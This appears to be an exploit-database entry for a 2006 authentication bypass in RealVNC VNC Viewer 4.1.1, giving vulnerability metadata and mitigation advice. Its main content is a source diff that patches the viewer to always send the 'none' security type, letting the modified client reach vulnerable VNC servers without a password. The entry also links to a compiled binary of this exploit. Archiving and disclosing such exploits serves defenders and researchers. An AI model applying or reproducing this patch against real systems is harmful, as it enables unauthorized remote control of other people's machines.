VNC Null Authentication Force secType to equal secTypeNone

vendor:

VNC Viewer

by:

BL4CK

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: VNC Viewer

Affected Version From: 4.1.1

Affected Version To: 4.1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:realvnc:vnc_viewer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

VNC Null Authentication Force secType to equal secTypeNone

This vulnerability allows an attacker to bypass authentication in VNC Viewer by forcing the secType to equal secTypeNone.

Mitigation:

Upgrade to the latest version of VNC Viewer

Source

Exploit-DB raw data:

xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx        2005-03-11 09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx  2006-05-15 14:03:30.000000000 -0500
@@ -183,7 +183,12 @@

     // Inform the server of our decision
     if (secType != secTypeInvalid) {
-      os->writeU8(secType);
+
+      // [BL4CK] In response to the VNC Null Authentication
+      // force a secType to equal secTypeNone
+      // http://blacksecurity.org
+      secType = secTypeNone;
+      os->writeU8(secTypeNone);
       os->flush();
       vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }

E-DB Note:
Compiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)